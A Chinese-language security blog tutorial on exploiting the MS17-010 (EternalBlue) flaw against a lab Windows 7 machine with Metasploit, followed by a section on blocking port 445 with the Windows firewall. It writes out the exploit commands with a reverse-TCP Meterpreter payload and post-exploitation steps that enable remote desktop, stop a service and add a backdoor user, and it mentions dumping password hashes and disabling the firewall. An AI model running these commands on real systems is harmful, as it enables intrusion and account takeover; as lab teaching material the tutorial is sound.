利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

admin 2021年10月31日07:33:06安全文章评论57 views1114字阅读3分42秒阅读模式


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


一、环境配置(两台主机均采用 NAT 桥接模式)

1、Kali 主机的 IP 配置:


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


2、Windows7 主机的 IP 配置:


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


3.查看 Win7 主机打开的端口


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


二、利用 MSF 框架对 Win7 进行永恒之蓝渗透【实战篇】


1、启用 msfconsole 攻击平台


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


2、查找目标主机的漏洞编号


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


3、使用永恒之蓝漏洞模块


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


4、设置 Payload


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


5、查看 Payload 的设置情况


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


6、实施攻击


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


msf5 > search ms17_010msf5 > use exploit/windows/smb/ms17_010_eternalbluemsf5 exploit(windows/smb/ms17_010_eternalblue) > set payloadwindows/x64/meterpreter/reverse_tcpmsf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.100.131rhost => 192.168.100.131msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.100.128lhost => 192.168.100.128msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 1234msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit



7、攻入目标主机


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


8、查看目标主机的操作系统信息


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


9、对目标主机的屏幕进行截图


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


10、查看目标主机所有的用户名和密码(密码显示为 hash 值)


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


11、关闭防火墙


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


12、关闭 Telnet 服务

net stop TlntSvr


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


13、用两种方法开启远程桌面服务,并查看远程桌面功能启用情况
(1)方法 1:run getgui -e


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


(2)方法 2:run post/windows/manage/enable_rdp


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


14、创建系统用户


run getgui –u test –p 123456


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


三、利用 MSF 框架对 Win7 进行永恒之蓝渗透【防御篇】


1、在打开 445 端口的前提下,利用系统自带的防火墙进行规则过滤



1)在 win7 上打开防火墙设置窗口,并启用防火墙



利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


2)没有设置防火墙过滤规则前用 Nmap 对目标主机进行端口扫描


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


3)针对 445 端口设置过滤规则


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


4)设置防火墙过滤规则后的端口扫描


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


5)目标主机设置针对 445 端口的过滤规则后,kali 再对目标主机实施攻击


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7


利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

本文始发于微信公众号(疯猫网络):利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月31日07:33:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7 http://cn-sec.com/archives/414418.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: